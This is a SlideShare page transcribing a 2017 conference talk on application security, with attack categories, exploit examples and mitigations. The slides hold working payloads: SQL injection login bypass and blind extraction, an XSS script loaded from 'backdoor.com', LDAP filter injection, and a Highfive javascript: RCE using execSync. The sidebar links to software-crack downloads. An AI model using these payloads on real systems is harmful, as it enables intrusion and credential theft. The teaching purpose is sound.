AOEconf17: Application Security - Bastian Ike
0 likes185 views
Bastian Ike, developer at AOE, talks about Application Security: How security issues develop, and how they are found, exploited and can be mitigated. Security issues usually develop due to assumptions on certain behavior, bugs and just missing knowledge about what is actually possible, and how these bugs can be exploited eventually. Bastian shows how these issues develop, and how attackers utilize and combine bugs to eventually exploit systems and elevate privileges. Bastian also shows how we can mitigate security issues and how to spot them in our code. https://www.aoe.com
More Related Content
What's hot (19)
Similar to AOEconf17: Application Security - Bastian Ike (20)
More from AOE (20)
Recently uploaded (20)
![Pixologic ZBrush Crack Plus Activation Key [Latest 2025] New Version](https://cdn.slidesharecdn.com/ss_thumbnails/fashionevolution2-250322112409-f76abaa7-250428124909-b51264ff-250504160528-fc2bb1c5-thumbnail.jpg?width=560&fit=bounds)
![Download Wondershare Filmora Crack [2025] With Latest](https://cdn.slidesharecdn.com/ss_thumbnails/neo4j-howkgsareshapingthefutureofgenerativeaiatawssummitlondonapril2024-240426125209-2d9db05d-250419-250428115407-a04afffa-thumbnail.jpg?width=560&fit=bounds)
AOEconf17: Application Security - Bastian Ike
- 1. Application Security AOE Conf 2017
- 3. Application Security • Security in software • Not management security, perimeter security, etc • Possible Attack vectors • How to prevent issues
- 5. Code Execution Make a system execute arbitrary code
- 6. Buffer Overflows • Assembler code injected into memory • 1996, Aleph One, "Smashing the stack for fun and profit" • Possible by overflowing a programs memory with controlled data
- 7. SQL Injection • Execute arbitrary SQL code • Possible by interpolating user-submitted data without proper escaping • Can be used to read/write files on DB server
- 8. Cross Site Scripting • Execute arbitrary JavaScript in a privileged context • Executed on a client's machine • Privileged context: Browser (domain/cookies) • Steal/Modify cookies • AJAX Requests to privileged areas
- 9. Cryptography Attack cryptographic measures for confidentiality and integrity
- 10. Signatures • Fake signatures/tokens for unauthorised access
- 11. Encryption • Break encryption • Missing encryption • Broken Encryption: • Example: Bleichenbacher RSA
- 12. Business Logic Make legit code behave in an unintended way
- 13. Race Conditions • Re-order execution flows to change an operations result
- 14. Exploit basics
- 15. SQL Injection • Query: SELECT * FROM users WHERE username="${USERNAME}" AND password="${PASSWORD}"; • Username: Bastian • Passwort: Sesame098 • Query: SELECT * FROM users WHERE username="Bastian" AND password="Sesame098";
- 16. SQL Injection • Query: SELECT * FROM users WHERE username="${USERNAME}" AND password="${PASSWORD}"; • Username: Bastian • Passwort: " OR 1=1 -- x • Query: SELECT * FROM users WHERE username="Bastian" AND password="" OR 1=1 -- x";
- 17. SQL Injection • Query: SELECT * FROM logs WHERE token="${TOKEN}"; • Token: a" AND IF(SUBSTRING( (SELECT password FROM users WHERE name="admin" LIMIT 1) ,0,1) = 'a', SLEEP(5), 0) -- x • Query: SELECT * FROM logs WHERE token="a" AND IF(SUBSTRING( (SELECT password FROM users WHERE name="admin" LIMIT 1) ,0,1) = 'a', SLEEP(5), 0) -- x";
- 18. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page=hello • Template: <a href="hello">You are here</a>
- 19. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page="><script src="http://backdoor.com/x.js"></script> • Template: <a href=""><script src="http:// backdoor.com/x.js"></script>">You are here</a>
- 20. Cross-Site Scripting • Code runs in Browser of the one opening the link • Access to Cookies+LocalStorage • Can send requests and read their result (emulate administrator behaviour) • Change page look/behaviour (steal passwords, etc)
- 21. Exploits samples
- 22. Mattermost LDAP Injection • https://mattermost/api/v3/users/login • login_id: username)(givenName=test* • password: "" • Response: • 401: OK, query successful • 50x: Error, query failed
- 26. Mattermost LDAP Injection • Prevention: properly escape characters which might be interpreted by LDAP
- 27. Highfive RCE • Target: URL-Handler highfive:// • Possible arguments: ?domain=, ?protocol=
- 28. Highfive RCE Privileged Non-Privileged Display Web-pages Execute processes etc Highfive Sandbox (NW.js) Whitelist: https://highfive.com https://dev.highfive.com
- 29. Highfive RCE • highfive://test.com.a/? domain=alert(require('child_process').execSyn c('hostname;echo;id').toString())// &protocol=javascript • Starts Highfive on a privileged initial domain • Redirects to: protocol + '://' + domain + path • Becomes: javascript:// alert(require('child_process').execSync('host name;echo;id').toString())//something
- 30. Highfive RCE • Redirect to javascript:// does not change the sandbox • Works on any operating system • Thank you JavaScript 😙
- 31. Highfive RCE • Prevention: whitelist redirect targets
- 32. JWT Null Tokens
- 33. JWT Null Tokens
- 34. JWT Null Tokens
- 35. JWT Null Tokens
- 36. JWT Null Tokens • Prevention: Do not allow null signature algorithms
- 38. Finding Security issues • Code Reviews • Curiosity • (sometimes: automated scanners)
- 39. Stay up to date
- 40. React fast
- 41. React fast • Escalation plan for security incidents • Fast deployment strategies • Firewall setup to cut off possible infected systems • Snapshot infrastructure for later analysis